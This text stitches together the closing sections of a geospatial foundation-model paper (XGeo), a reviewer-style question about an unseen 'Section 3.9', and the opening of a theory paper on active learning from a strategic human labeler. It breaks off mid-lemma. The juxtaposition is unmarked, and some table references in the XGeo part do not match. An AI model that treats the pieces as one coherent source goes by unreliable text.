| XGeo | 87.5 | 92.9 | 0.026 | 4.87 | 0.842 | 22.850 | 0.668 | 75.8 |

In Table 3, we report mean average precision (mAP) results on BEN for all methods. Our model provides robust performance against other pretraining methods (Mañas et al., 2021; Cong et al., 2022; Chen et al., 2020; Wanyan et al., 2023; Mendieta et al., 2023; Liu et al., 2022b), including ImageNet-22k (Liu et al., 2022b). We note that these competing methods use different backbones; their results under random initialization and ImageNet initialization can be found in previous studies (Mendieta et al., 2023; Cong et al., 2022). Furthermore, one key motivation for training a geospatial foundation model is to improve sample efficiency on downstream tasks. Notably, we find that our model maintains strong performance on BEN even when given only 1% of the training data (Appendix C.3).

**Cloud removal.** The majority of optical observations acquired via spaceborne Earth imagery are affected by clouds, and reconstructing cloud-covered information has presented challenges in previous studies. While optical imagery is impacted by adverse weather conditions and lack of daylight, SAR sensors are unaffected, providing a valuable source of complementary information. Consequently, performing cloud removal without SAR data can significantly degrade task performance (Xu et al., 2022b). We evaluate our model on SEN12MS-CR (Ebel et al., 2020). Table 4 shows promising results in Spectral Angle Mapper (SAM) and Mean Absolute Error (MAE), outperforming existing cloud removal models (Grohnfeldt et al., 2018; Meraner et al., 2020; Xu et al., 2022b). Qualitative results are presented in Appendix C.5. Meanwhile, the structural similarity index measure (SSIM) metric is comparable to those methods. Our multisensor pretraining approach, which incorporates SAR data, enables effective cloud removal, while other geospatial pretraining models that rely solely on optical data do not demonstrate cloud removal capabilities (Table 5).

**Pan-sharpening and Segmentation.**
We extend our evaluation to include tests on pan-sharpening and segmentation. The results presented in Table 5 demonstrate that XGeo surpasses other models in performance. A more comprehensive discussion of these evaluations can be found in Appendix C.4.

4.2 COMPARISON WITH SINGLE-SENSOR PRETRAINING

To underscore the pivotal role of multiple sensor modalities in pretraining, we compare our multisensor pretraining approach using XGeoSet with models pretrained on only one sensor modality (i.e., either SAR or Sentinel-2) from SEN12MS (Schmitt et al., 2019). We assess the performance of these models on BEN (Sumbul et al., 2019) and SEN12MS-CR (Ebel et al., 2020), employing both sensors individually and in combination. Figure 3 highlights two advantages of our model: (1) the multisensor pretraining model consistently outperforms models pretrained with a single sensor modality, as indicated by superior performance across all columns when the sensor modality is fixed; (2) using both sensors for tasks like land-use classification and cloud removal leads to enhanced performance, demonstrated by higher accuracy across all rows when the pretraining data is fixed. The second advantage can be credited to the complementary data offered by the two sensors. For instance, SAR images provide crucial information for identifying water bodies and urban structures, as they capture the radar backscatter properties of the Earth's surface. This unique data, when paired with the spectral information from Sentinel-2 images, improves classification performance. Moreover, SAR's ability to penetrate clouds significantly contributes to more effective cloud removal (Xu et al., 2022b). Notably, when evaluating on the BEN dataset with only the Sentinel-2 modality, our method still achieves a better result than other pretraining methods (86.8%). This rules out the possibility that XGeo's improvement stems solely from the increased number of sensor modalities in the downstream tasks.

4.3 PRETRAINING FROM SCRATCH PERFORMS BETTER

Table 5: Distillation from other pretrained models vs. pretraining from scratch.

| Methods | 1% BEN mAP (↑) | 10% BEN mAP (↑) | SEN12MS-CR MAE (↓) | SEN12MS-CR SAM (↓) | SEN12MS-CR SSIM (↑) | SpaceNet PSNR (↑) | SpaceNet SSIM (↑) | Vaihingen mIOU (↑) |
|--------------------------------|----------------|-----------------|--------------------|---------|----------|----------|----------|----------|
| Distilled from ImageNet22k | 79.4 | 86.4 | 0.035 | 6.42 | 0.726 | 22.107 | 0.621 | 72.9 |
| Distilled from CLIP | 76.6 | 83.8 | 0.051 | 8.96 | 0.707 | 22.559 | 0.674 | 69.3 |
| Reconstruct CLIP (EVA) | 73.5 | 80.6 | 0.053 | 9.96 | 0.689 | 21.778 | 0.591 | 65.7 |
| From scratch | 80.9 | 87.2 | 0.026 | 5.04 | 0.821 | 22.742 | 0.677 | 74.8 |

We evaluate the effectiveness of leveraging existing pretrained vision models for multisensor geospatial pretraining. Following Mendieta et al. (2023), intermediate features from an ImageNet-22k model are distilled into the student. A similar experiment is conducted with the CLIP model (Radford et al., 2021), recognized for its potent multimodal representation learning capabilities; distillation from ImageNet-22k outperforms distillation from CLIP (Radford et al., 2021). The EVA method (Fang et al., 2022), which reconstructs the CLIP features of masked patches instead of the patches themselves, is also examined.
Despite its proven advantage over traditional MIM approaches like MAE (He et al., 2021a), it surprisingly underperforms the other methods in our downstream evaluation, suggesting a larger domain gap for CLIP features (Radford et al., 2021) when applied to multisensor geospatial data. In contrast, optimal accuracy for multisensor geospatial pretraining is achieved when the model is trained from scratch. The subpar performance of distillation is attributed to the pronounced domain gap between natural images and geospatial-specific sensors. Moreover, distillation has an inherent limitation, as it bounds the student model's performance to that of the teacher model (Mendieta et al., 2023). This significant domain gap can be attributed to the fundamental disparities in the physical mechanisms of optical and microwave remote sensing: while optical remote sensing hinges on the reflection and absorption of electromagnetic radiation, microwave remote sensing is governed by scattering, penetration, and dipole interference of microwaves (Fornaro & Pascazio, 2014). Given that natural images are predominantly captured by optical sensors, a substantial domain discrepancy results. Accordingly, when fine-tuning a model for multisensor geospatial tasks, it is advisable to use pretrained weights derived from multisensor data for optimal performance. This finding underscores the need for robust foundation models specific to the geospatial domain, capable of handling diverse sensor data and enhancing performance on multisensor downstream tasks.

4.4 ABLATION STUDIES

Table 6: Quantitative results of XGeo when using dataset-homogeneous and batch-heterogeneous approaches (Aghajanyan et al., 2021).

| Methods | 1% BEN mAP (↑) | 10% BEN mAP (↑) | SEN12MS-CR MAE (↓) | SEN12MS-CR SAM (↓) | SEN12MS-CR SSIM (↑) | SpaceNet PSNR (↑) | SpaceNet SSIM (↑) | Vaihingen mIOU (↑) |
|--------------------------|----------------|-----------------|--------------------|--------------------|----------|----------|----------|----------|
| Dataset homogeneous | 77.2 | 84.4 | 0.035 | 10.4 | 0.703 | 19.234 | 0.589 | 72.3 |
| Batch heterogeneous | 80.8 | 87.2 | 0.026 | 5.04 | 0.821 | 22.742 | 0.677 | 74.8 |

Table 7: Quantitative results of XGeo with and without MoE / cross-sensor reconstruction.

| MoE | Cross-sensor | Cross-sensor percentage | 1% BEN mAP (↑) | 10% BEN mAP (↑) | SEN12MS-CR MAE (↓) | SEN12MS-CR SAM (↓) | SEN12MS-CR SSIM (↑) | SpaceNet PSNR (↑) | SpaceNet SSIM (↑) | Vaihingen mIOU (↑) |
|-----|--------------|------------------------|----------------|-----------------|--------------------|--------------------|----------|----------|----------|----------|
| ❌ | ❌ | 0% | 78.3 | 86.2 | 0.038 | 8.19 | 0.735 | 22.333 | 0.589 | 72.8 |
| ✔ | ❌ | 0% | 78.5 | 86.2 | 0.026 | 5.11 | 0.767 | 22.528 | 0.637 | 73.4 |
| ❌ | ✔ | 50% | 80.7 | 86.9 | 0.036 | 8.67 | 0.753 | 22.518 | 0.611 | 73.6 |
| ✔ | ✔ | 100% | 80.5 | 86.8 | 0.026 | 4.96 | 0.789 | 22.634 | 0.649 | 74.4 |
| ✔ | ✔ | 50% | 80.9 | 87.5 | 0.026 | 5.04 | 0.821 | 22.742 | 0.677 | 74.8 |

**Heterogeneous Batching.** Another critical factor in achieving successful multi-sensor pretraining and learning generalizable representations is the construction of batches. Inspired by multitask learning (Aghajanyan et al., 2021), we experimented with two balancing schemes: dataset-homogeneous and batch-heterogeneous (Aghajanyan et al., 2021). As the results in Table 6 show, heterogeneous batching delivers superior performance to the dataset-homogeneous scheme.
This demonstrates that heterogeneous batching not only works in multitask pre-finetuning, but also significantly impacts the performance and generalizability of a multi-sensor pretrained model.

**MoE and cross-sensor pretraining.** In the proposed XGeo model, we incorporate both the cross-sensor pretraining paradigm and the Mixture of Experts (MoE). In an ablation study, we present the results when either MoE or cross-sensor pretraining is omitted. As shown in Table 7, removing MoE from the model results in similar performance on the BEN dataset, while other tasks see a more substantial decrease. This uneven response across different tasks aligns with observations made in several previous multi-modal studies (Zhu et al., 2022). On the other hand, removing the cross-sensor paradigm leads to a consistent performance decline across all tasks. It is natural to question how the proportion of sensor crossing affects performance. To explore this, we perform an ablation study on the percentage of sensors subject to cross-reconstruction. Our results suggest that a sensor crossing rate of 50% provides slightly superior outcomes compared to a rate of 100%. This indicates that the optimal sensor crossing strategy maintains a balance between the benefits of cross-reconstruction and the retention of sensor-specific information, consequently enhancing performance across a diverse range of geospatial tasks.

5 CONCLUSION

We present a multisensor pretraining model that incorporates a novel cross-sensor paradigm for joint representation learning, effectively capturing relationships between corresponding sensors. To handle the diverse representations of geospatial data during pretraining, we employ MoE and heterogeneous batching. Our pretrained model is based on a large-scale multisensor dataset comprising over 2 million images, and our approach demonstrates superior performance across various multisensor downstream tasks. Limitations and future directions of our study can be found in Appendix D.

REFERENCES

Armen Aghajanyan, Akshat Shrivastava, Anchit Gupta, Naman Goyal, Luke Zettlemoyer, and Sonal Gupta. Better fine-tuning by reducing representational collapse, 2020.

Armen Aghajanyan, Anchit Gupta, Akshat Shrivastava, Xilun Chen, Luke Zettlemoyer, and Sonal Gupta. Muppet: Massive multi-task representations with pre-finetuning. In Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing, pp. 5799–5811, Online and Punta Cana, Dominican Republic, November 2021. Association for Computational Linguistics. doi: 10.18653/v1/2021.emnlp-main.468. URL https://aclanthology.org/2021.emnlp-main.468

Raquel Aoki, Frederick Tung, and Gabriel L. Oliveira. Heterogeneous multi-task learning with expert diversity. IEEE/ACM Transactions on Computational Biology and Bioinformatics, pp. 1–1, 2022. doi: 10.1109/tcbb.2022.3175456. URL https://doi.org/10.1109%2Ftcbb.2022.3175456

Kumar Ayush, Burak Uzkent, Chenlin Meng, Kumar Tanmay, Marshall Burke, David B. Lobell, and Stefano Ermon. Geography-aware self-supervised learning. CoRR, abs/2011.09980, 2020. URL https://arxiv.org/abs/2011.09980

Roman Bachmann, David Mizrahi, Andrei Atanov, and Amir Zamir. Multimae: Multi-modal multi-task masked autoencoders, 2022.

Bernhard Bauer-Marschallinger, Senmao Cao, Claudio Navacchi, Vahid Freeman, Felix Reuß, Dirk Geudtner, Björn Rommen, Francisco Ceba, Paul Snoeij, Evert Attema, Christoph Reimer, and Wolfgang Wagner. The normalised sentinel-1 global backscatter model, mapping earth's land surface with c-band microwaves.
Scientific Data, 8, 10 2021. doi: 10.1038/s41597-021-01059-7. Keumgang Cha, Junghoon Seo, and Yeji Choi. Contrastive multiview coding with electro-optics for SAR semantic segmentation. CoRR, abs/2109.00120, 2021. URL https://arxiv.org/abs/2109.00120 Xinlei Chen, Haoqi Fan, Ross B. Girshick, and Kaiming He. Improved baselines with momentum contrastive learning. CoRR, abs/2003.04297, 2020. URL https://arxiv.org/abs/2003.04297 Yuxing Chen and Lorenzo Bruzzone. Self-supervised sar-optical data fusion of sentinel-1/-2 images. IEEE Transactions on Geoscience and Remote Sensing, 60:1–11, 2022. doi: 10.1109/TGRS.2021.3128072. Zitian Chen, Yikang Shen, Mingyu Ding, Zhenfang Chen, Hengshuang Zhao, Erik Learned-Miller, and Chuang Gan. Mod-squad: Designing mixture of experts as modular multi-task learners, 2022. Zewen Chi, Shaohan Huang, Li Dong, Shuming Ma, Bo Zheng, Saksham Singhal, Payal Bajaj, Xia Song, Xian-Ling Mao, Heyan Huang, and Furu Wei. XLM-E: Cross-lingual language model pre-training via ELECTRA. In Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pp. 6170–6182, Dublin, Ireland, May 2022. Association for Computational Linguistics. doi: 10.18653/v1/2022.acl-long.427. URL https://aclanthology.org/2022.acl-long.427 Gordon Christie, Neil Fendley, James Wilson, and Ryan Mukherjee. Functional map of the world, 2018. Yezhen Cong, Samar Khanna, Chenlin Meng, Patrick Liu, Erik Rozi, Yutong He, Marshall Burke, David B Lobell, and Stefano Ermon. Satmae: Pre-training transformers for temporal and multi-spectral satellite imagery. arXiv preprint arXiv:2207.08051, 2022. Alexis Conneau, Kartikay Khandelwal, Naman Goyal, Vishrav Chaudhary, Guillaume Wenzek, Francisco Guzmán, Edouard Grave, Myle Ott, Luke Zettlemoyer, and Veselin Stoyanov. Unsupervised cross-lingual representation learning at scale, 2020.
s5hSp7EdL3
What is the purpose of Section 3.9? The authors say that this section is to compare with EPI-CAL, but only give a formal result for EPI-CAL ($\Omega(\sqrt{m})$ samples in Proposition 3.9) and didn't give any formal result for the algorithm they proposed for comparison.
THE HUMAN-AI SUBSTITUTION GAME: ACTIVE LEARNING FROM A STRATEGIC LABELER

Tom Yan Machine Learning Department Carnegie Mellon University [email protected]

Chicheng Zhang Department of Computer Science University of Arizona [email protected]

ABSTRACT

The standard active learning setting assumes a willing labeler, who provides labels on informative examples to speed up learning. However, if the labeler wishes to be compensated for as many labels as possible before learning finishes, the labeler may benefit from actually slowing down learning. This incentive arises, for instance, if the labeler is to be replaced by the ML model once it is trained. In this paper, we initiate the study of learning from a strategic labeler, who may abstain from labeling to slow down learning. We first prove that strategic abstention can prolong learning, and propose a novel complexity measure and representation to analyze the query complexity of the learning game. Next, we develop a near-optimal deterministic algorithm, prove its robustness to strategic labeling, and contrast it with other active learning algorithms. We also analyze extensions that encompass more general learning goals and labeler assumptions. Finally, we characterize the query cost of multi-task active learning, with and without abstention. Our first exploration of strategic labeling aims to consolidate our theoretical understanding of the imitative nature of ML in human-AI interaction.

1 INTRODUCTION

Over the past few years, the rapid growth of Machine Learning (ML) capabilities has raised the possibility of wide-ranging automation and consequent worker replacement. Taking a step back to before these ML models are phased in, we ask a basic question about how they first come about: Where will the training data for these ML models come from? In many industries, domain-specific knowledge is required to perform the job. Much of this expertise is proprietary (e.g., trade secrets) and not made publicly available (e.g., on the internet). Thus, in these industries, the answer to our question is, paradoxically, that the training data can only come from the workers themselves. At this point, we arrive at a clear conflict of interest. On the one hand, corporations wish to automate tasks through ML models. On the other hand, the data needed to train these models can only come from the domain experts: the workers themselves, who know full well that these models, when trained, will go on to replace them at their jobs. This raises the possibility that we may see workers actually aim to slow down learning, in order to delay replacement and be compensated for as many labels as possible before then. We note that the idea of AI job displacement is no longer a rarefied topic, entertained only in academia. The possibility of AI displacement has been written about in recent articles (Benson, 2023), and has even surfaced in labor union negotiations. In May 2023, Hollywood screenwriters went on strike to negotiate a better deal. One of their demands is that there be limits on companies' ability to train ML models on the scripts produced by the writers themselves (WGA, 2023). Indeed, without this protection, companies can train AI models to emulate and write as well as the writers, eventually replacing them with the trained models. In sum, we believe it is now high time to develop our understanding of the replacement aspect of learning, which is what we set out to do in this paper.
Remark: Before moving on, we point out that the conflict of interest described above is fairly general, and arises whenever the labeler wishes to maximize payment from labeling. Consider more broadly the interaction between any data provider (e.g., a data labeling company) and learner (e.g., a company needing ML models). The more informative the data labeled by the provider, the faster the learner learns, the fewer examples the learner needs to query from the provider, and the lower the provider's subsequent payment. The AI automation setting we describe is one of many such instances where the labeler's objective is at odds with that of the learner: the labeler has the incentive to slow down learning, to maximize their compensation from labeling before the models are fully trained and render their labeling expertise redundant.

In this paper, we study the learning game that arises when the labeler's and learner's objectives are at odds. The learner wants to learn quickly, but the labeler wants learning to progress slowly. Notably, this requires departing from the standard assumption in learning theory that the labeler readily labels any example queried (including the informative examples). We term this game the Human-AI Substitution game, since typically the labeler is human and the more the model is trained, the less the learner needs the labeler (to label). To study the rate of learning, we turn to theory to analyze how the labeler can slow down learning.

Our Contributions: In Section 2, we formalize the learning game and game value, developing a novel representation of the game state: the effective version space (henceforth abbreviated as E-VS). In Section 3, we then develop a natural, efficient learning algorithm (Algorithm 2), which we prove achieves near-optimal minimax query complexity. We also show that other AL algorithms may be inefficient. In Section 4, we examine more general settings involving noisy or non-strategic labelers, showing that our algorithm nevertheless achieves good query complexity. Finally, in Section 5, we consider the multi-task setting and analyze when strategic labeling can further enlarge the learner's query complexity beyond the sum of the individual tasks' query complexities.

1.1 ACTIVE LEARNING WITH A SIMPLE TWIST

We begin our investigation by adopting the standard active learning setup (Hanneke et al., 2014), with the only twist that the labeler aims to maximize the learner's query cost. We focus on perhaps the most fundamental setting: exact learning through membership queries (Angluin, 1988; Hegedüs, 1995). As we will see, this setup is fairly general, and one may use standard reductions to reduce the PAC and noisy settings to this setting.

Setup of the Learning Game:

- The learner is interested in learning a hypothesis $h^*$ in hypothesis class $\mathcal{H} \subset (\mathcal{X} \rightarrow \{+1, -1\})$ over a finite pool of unlabeled data $\mathcal{X}$, collected by the learner.
- The labeler knows $h^*$ and responds using labeling strategy $T$ with response $T(x) \in \{h^*(x), \bot\}$, where $\bot$ denotes abstention.\footnote{In Section 2.2 and Appendix B, we also study a variant of the game (Protocol 4), where the labeler can choose to reveal binary labels or abstain adaptively.}
- The learner repeatedly interacts with the labeler adaptively, making label queries on unqueried examples $x$ and incurring cost $\mathbb{I}(T(x) \neq \bot)$ for each such query.\footnote{Note that we define the cost of all non-abstention label feedback to be 1 for all $x$.
However, as we show in Appendix C, our algorithm generalizes to handle varying data prices (the price for non-abstention label feedback, $c(x)$, can depend on the feature $x$).}

In this paper, we model the labeler as being able to strategically abstain on queried data in order to slow down learning. Being the domain expert with specialized expertise, the labeler is assumed to be able to use this leverage to selectively decide which data points to label. As noted in Section 1, some data points are particularly informative, and naturally the labeler would wish to decline labeling these so that more data would need to be labeled. We also note that this strategy of slowing down the transfer of expertise is not a novel conception: it has been well documented that in apprenticeships, for instance, teachers (masters) strategically slow down the training of their apprentices (Garicano & Rayo, 2017). The interaction finishes when the termination condition is met, or when the learner's querying strategy halts. Based on the learner's desired learning outcome, the termination condition is defined as the point at which $h^* \in \mathcal{H}$ is identified, which we formalize in the following section. If the termination condition is met, the labeler gets a payoff of 1 for every labeled example provided. If the termination condition is not met, the labeler gets a payoff of 0. In this game, the learner aims to minimize the total payoff needed to learn $h^*$, while the labeler aims for the opposite, to maximize the total payoff.

Protocol 1 Human-AI Substitution game interaction protocol

Require: Instance domain \( \mathcal{X} \), hypothesis class \( \mathcal{H} \), queried examples \( S_X \), queried dataset \( S \)
1: \( V \leftarrow \mathcal{H}, S_X \leftarrow \emptyset, S \leftarrow \emptyset \)
2: Nature chooses some \( h^* \in \mathcal{H} \) given to the labeler \( \triangleright \) Throughout, the labeler maintains that \( h^* \) is identifiable: \( h^* \in E(V, S_X) \).
3: while \( |E(V, S_X)| \geq 2 \) do
4: Learner adaptively queries example \( x \in \mathcal{X} \setminus S_X \) using learning algorithm \( \mathcal{A} \)
5: Labeler adaptively gives label feedback \( y \in \{h^*(x), \bot\} \) using labeling oracle \( T \)
6: Learner updates the VS: \( V \leftarrow V[(x, y)] \) \( \triangleright \) Recall Definition 2.1
7: \( S_X \leftarrow S_X \cup \{x\}, S \leftarrow S \cup \{(x, y)\} \)
8: if \( |E(V, S_X)| = 1 \) then
9: Learner makes total payment to the labeler: \( \sum_{(x_i, y_i) \in S} \mathbb{I}\{y_i \neq \bot\} \)

Guaranteeing the Learning Outcome: Before proceeding, we note that the labeler can always satisfy the learner's objective, by using the non-strategic labeling strategy \( T(x) = h^*(x) \) as in the standard active learning setup. Since the labeler can realize the learning outcome, we assume that the learner has this guarantee (of the learning outcome) written into the contract; no payment is awarded otherwise. Indeed, if the labeler could not guarantee the learning outcome, it seems unlikely that the learner would have chosen to contract the labeler in the first place.

Prolonging Learning through Abstention: The key tension in this interaction is that the labeler has to label in order to be paid, but any labeling results in less data that subsequently needs to be labeled. With the labeler only allowed to abstain besides labeling, it is natural to ask: can abstention significantly enlarge the query complexity?
Our investigation is motivated by the affirmative answer below, where we find that abstention can exponentially enlarge the query complexity in some settings.

Proposition 1.1 (Abstention induces exponentially higher query complexity). There exist a hypothesis class \( \mathcal{H} \) and instance domain \( \mathcal{X} \) such that: the query complexity is \( O(\log |\mathcal{X}|) \) if the labeler is unable to abstain, and \( \Omega(|\mathcal{X}|) \) for any learning algorithm if the labeler is allowed to abstain.

2 THE MINIMAX LEARNING GAME

2.1 REPRESENTATION OF THE LEARNING GAME STATE

To study this learning game, we first develop a useful, succinct representation of the game state, which is a key contribution of our paper and allows us to formalize the termination condition and the protocol. We start by defining the canonical state representation used in conventional AL without abstention, the version space (VS) (Mitchell, 1982).

Definition 2.1. Given a queried dataset \( S \) and a set of hypotheses \( V \), define the version space \( V[S] = \{ h \in V : \forall (x, y) \in S \text{ s.t. } y \neq \bot, h(x) = y \} \) as the subset of hypotheses in \( V \) consistent with \( S \).

In our setting of learning with strategic abstention, some queried examples in \( S \) will not have their binary labels available to the learner, due to the labeler's abstention. We thus observe that certain hypotheses may be consistent, yet indistinguishable from other hypotheses, even if all the remaining unqueried data is labeled. This motivates defining a new notion of identifiability of a hypothesis under a queried dataset \( S \). Let the set of all queried examples be \( S_X = \{ x : (x, y) \in S \} \).

Definition 2.2. Given the set of queried examples and their label responses \( S \), and the queried examples \( S_X \), hypothesis \( h \in \mathcal{H} \) is said to be identifiable with respect to \( S \) if:

- \( h \) is consistent with \( S \), i.e., \( h \in \mathcal{H}[S] \);
- for all other consistent \( h' \in \mathcal{H}[S] \): \( h'(\mathcal{X} \setminus S_X) = h(\mathcal{X} \setminus S_X) \implies h' = h \), where for brevity we denote \( h_1(U) = h_2(U) \iff \forall x \in U, h_1(x) = h_2(x) \).

In other words, \( h \) is identifiable with respect to \( S \) if over the remaining examples \( \mathcal{X} \setminus S_X \), some labeling strategy (specifically, one that reveals \( h(x) \) on every \( x \in \mathcal{X} \setminus S_X \)) allows \( h \) to be distinguished from all other hypotheses in \( \mathcal{H}[S] \).

| \( \mathcal{X} \) | \( x_1 \) | \( x_2 \) | \( x_3 \) |
|---|---|---|---|
| \( h_1 \) | +1 | -1 | +1 |
| \( h_2 \) | -1 | -1 | +1 |
| \( h_3 \) | +1 | +1 | -1 |
| \( h_4 \) | -1 | +1 | -1 |
| \( h_5 \) | +1 | +1 | +1 |

Table 1: Consider an example hypothesis class \( \mathcal{H} = \{h_1, h_2, h_3, h_4, h_5\} \) and instance space \( \mathcal{X} = \{x_1, x_2, x_3\} \). The interaction history is \( S = \{(x_1, \bot)\} \), and therefore \( S_X = \{x_1\} \). Under \( S \), we have that the VS (Definition 2.1) is \( V = \mathcal{H}[S] = \{h_1, h_2, h_3, h_4, h_5\} \). We observe that \( h_1 \) and \( h_2 \) make identical predictions on \( \mathcal{X} \setminus S_X = \{x_2, x_3\} \). Likewise, \( h_3 \) and \( h_4 \) make identical predictions on \( \mathcal{X} \setminus S_X \). Therefore, the effective version space is actually \( E(V, S_X) = \{h_5\} \). If the game reaches this stage, the learner can already identify that the target \( h^* \) must be \( h_5 \).

With this, we may develop a new representation of the state of the game, the effective version space (E-VS).
The E-VS is a refinement of the VS, and comprises only the identifiable hypotheses given the examples queried. Please see Table 1 for an illustration.

**Remark:** The key insight here is that abstention can in fact reveal information, even though abstention is used by the labeler to prevent releasing information about \( h^* \). The reason one can glean information from the labeler's abstention is that hypotheses can be rendered unidentifiable by abstention on a data point, and thus be ruled out without needing further queries. We operationalize this insight to develop the effective version space representation, which we formalize below.

**Definition 2.3.** Given a set of classifiers \( V \) and a set of examples \( S_X \), define
\[
E(V, S_X) = \{ h \in V : \forall h' \in V \setminus \{ h \} : h'(\mathcal{X} \setminus S_X) \neq h(\mathcal{X} \setminus S_X) \}
\]
as the effective version space with respect to \( V \) and \( S_X \).

**Definition 2.4.** \( h^* \in \mathcal{H} \) is identified by queried dataset \( S \) if the E-VS satisfies \( E(\mathcal{H}[S], S_X) = \{ h^* \} \).

With the identification criterion defined, we now formalize the interaction in Protocol 1. Here, the termination states are defined as either \( |E(V, S_X)| = 1 \) (a hypothesis is identified and the learning outcome is met), or \( E(V, S_X) = \emptyset \) (no hypothesis can be identified).

### 2.2 THE MINIMAX LEARNING GAME

In this paper, we analyze the minimax query complexity, that of the worst-case \( h^* \in \mathcal{H} \) to learn under Protocol 1. Towards this, we formulate a related minimax learning game (see Protocol 4 in Appendix B), where the learner queries and the labeler labels adaptively, depending on the interaction in previous rounds, with the game's optimal value function defined as follows:
\[
\text{Cost}(V, S_X) = \begin{cases} -\infty & E(V, S_X) = \emptyset \\ 0 & |E(V, S_X)| = 1 \\ \min_{x \in \mathcal{X} \setminus S_X} \max_{y \in \mathcal{Y}} \left( \mathbb{I}(y \neq \bot) + \text{Cost}(V[(x, y)], S_X \cup \{ x \}) \right) & |E(V, S_X)| \geq 2 \end{cases}
\]

Compared to the original Protocol 1, Protocol 4 can be viewed as giving the labeler more freedom: the labeler does not need to commit to providing binary labels using a given \( h^* \); it just needs to maintain the invariant that there is some \( h^* \) identifiable and consistent with all examples seen. As we will see shortly, the optimal value function Cost of Protocol 4 serves as a useful tool in analyzing the optimal query complexity of Protocol 1. In the case of non-identifiability, we use a base-case payoff of \(-\infty\) to encode that the labeler must ensure identification. As noted in Section 1, any optimal labeler will never end up in such a state, because a positive payoff can always be achieved: the strategy \( T = h^* \) results in a positive payoff. We now turn to formalizing what an identifiable strategy is.

**Definition 2.5.** Given \( h \in \mathcal{H} \), define the set of labeling oracles consistent with \( h \) as:
\[
\mathcal{T}_h = \{ T : \mathcal{X} \to \{+1, -1, \bot\} \mid \forall x \in \mathcal{X} \text{ s.t. } T(x) \neq \bot, T(x) = h(x) \}.
\]
For a subset \( S_X \subseteq \mathcal{X} \), let \( T(S_X) = \{(x, T(x)) : x \in S_X \} \) be the labeled (binary or abstention) examples provided by labeling oracle \( T \) on the examples \( S_X \).

**Definition 2.6.** A labeling strategy \( T \in \mathcal{T}_h \) is an identifiable oracle if the VS satisfies \( \mathcal{H}[T(\mathcal{X})] = \{ h \} \).
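To make Definitions 2.1–2.4 and the game value above concrete, the following is a minimal brute-force Python sketch on the Table 1 example. The helper names are ours, and the exhaustive recursion is only feasible for toy instances:

```python
from math import inf

# Table 1 example: hypotheses map x1, x2, x3 to {+1, -1}; None encodes ⊥.
X = ("x1", "x2", "x3")
H = {
    "h1": {"x1": +1, "x2": -1, "x3": +1},
    "h2": {"x1": -1, "x2": -1, "x3": +1},
    "h3": {"x1": +1, "x2": +1, "x3": -1},
    "h4": {"x1": -1, "x2": +1, "x3": -1},
    "h5": {"x1": +1, "x2": +1, "x3": +1},
}
BOT = None  # abstention

def version_space(V, S):
    """Definition 2.1: hypotheses in V consistent with every non-⊥ label in S."""
    return {n: h for n, h in V.items()
            if all(h[x] == y for x, y in S if y is not BOT)}

def effective_version_space(V, S_X):
    """Definition 2.3: hypotheses whose predictions on the unqueried pool
    X \\ S_X differ from those of every other hypothesis in V."""
    rest = [x for x in X if x not in S_X]
    pat = {n: tuple(h[x] for x in rest) for n, h in V.items()}
    return {n: V[n] for n in V
            if all(pat[n] != pat[m] for m in V if m != n)}

def cost(V, S_X):
    """Game value of Section 2.2 (minimax recursion; exponential time)."""
    E = effective_version_space(V, S_X)
    if len(E) == 0:
        return -inf
    if len(E) == 1:
        return 0
    return min(                                    # learner picks the query x
        max((0 if y is BOT else 1)                 # labeler picks the response y
            + cost(version_space(V, [(x, y)]), S_X | {x})
            for y in (+1, -1, BOT))
        for x in X if x not in S_X)

V = version_space(H, [("x1", BOT)])
print(sorted(effective_version_space(V, {"x1"})))  # ['h5'], as in Table 1
print(cost(H, frozenset()))                        # game value Cost(H, ∅)
```

The E-VS computation confirms the Table 1 analysis: after abstention on $x_1$, only $h_5$ remains identifiable.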
In the learning game, the labeler's strategy is some labeling oracle, while the learner's strategy corresponds to some deterministic querying algorithm \( \mathcal{A} : (\mathcal{X} \times \mathcal{Y})^* \to \mathcal{X} \), where \( \mathcal{Y} = \{+1, -1, \bot\} \). Define \( \text{Cost}_{\mathcal{A},T}(V, S_X) \) to be the value of the learning game under querying strategy \( \mathcal{A} \) and labeling strategy \( T \). The key result of this subsection is that the game value \( \text{Cost}(\mathcal{H}, \emptyset) \) can serve as a useful measure of minimax query complexity: \( \text{Cost}(\mathcal{H}, \emptyset) \) lower bounds the worst-case query complexity of any deterministic learning algorithm in Protocol 1.

Proposition 2.7. For any deterministic, exact learning algorithm \( \mathcal{A} \),
\[
\max_{h \in \mathcal{H}, T \in \mathcal{T}_h} \text{Cost}_{\mathcal{A},T}(\mathcal{H}, \emptyset) \geq \text{Cost}(\mathcal{H}, \emptyset).
\]
This means that for every exact learning algorithm \( \mathcal{A} \), there is some worst-case labeling oracle \( T \in \mathcal{T}_h \) that induces at least \( \text{Cost}(\mathcal{H}, \emptyset) \) cost. Please see Appendix B for all proofs in this section.

3 E-VS Bisection Algorithm Analysis

In this section, we design a natural and efficient algorithm based on E-VS bisection, Algorithm 2, which we prove achieves query complexity \( O(\text{Cost}(\mathcal{H}, \emptyset) \ln |\mathcal{H}|) \). Proving this guarantee allows us to use the lower bound result, Proposition 2.7, from the previous section to conclude that Algorithm 2's minimax query complexity is optimal up to log factors. Towards analyzing the algorithm's performance (and inspired by a related measure in Hanneke (2006) for the conventional non-abstention setting), we first introduce a new complexity measure named the global identification cost (GIC), which will allow us to bridge Algorithm 2's performance to Cost.

Definition 3.1. Given \( \mathcal{H}, \mathcal{X} \), define the global identification cost of \( V \subset \mathcal{H} \) and instance set \( S_X \) as:
\[
\text{GIC}(V, S_X) = \min \{ t \in \mathbb{N} : \forall T : \mathcal{X} \setminus S_X \rightarrow \{+1, -1, \bot\}, \\
\exists \Sigma \subseteq \mathcal{X} \setminus S_X \text{ s.t. } \sum_{x \in \Sigma} \mathbb{I}(T(x) \neq \bot) \leq t \land |E(V[T(\Sigma)], S_X \cup \Sigma)| \leq 1 \}.
\]
Intuitively, GIC represents the worst-case sample complexity of a clairvoyant querying algorithm that knows ahead of time the labeling oracle used by the labeler. The key lemma behind the analysis of Algorithm 2 is that there always exists a point that significantly bisects the current E-VS, resulting in a size reduction by a factor of at least \( 1 - \frac{1}{\text{GIC}(V, S_X)} \). This justifies greedily querying the point that maximally bisects the E-VS.

Lemma 3.2. For any \( V, S_X \) such that \( \text{GIC}(V, S_X) \) is finite, \( \exists x \in \mathcal{X} \setminus S_X \) such that:
\[
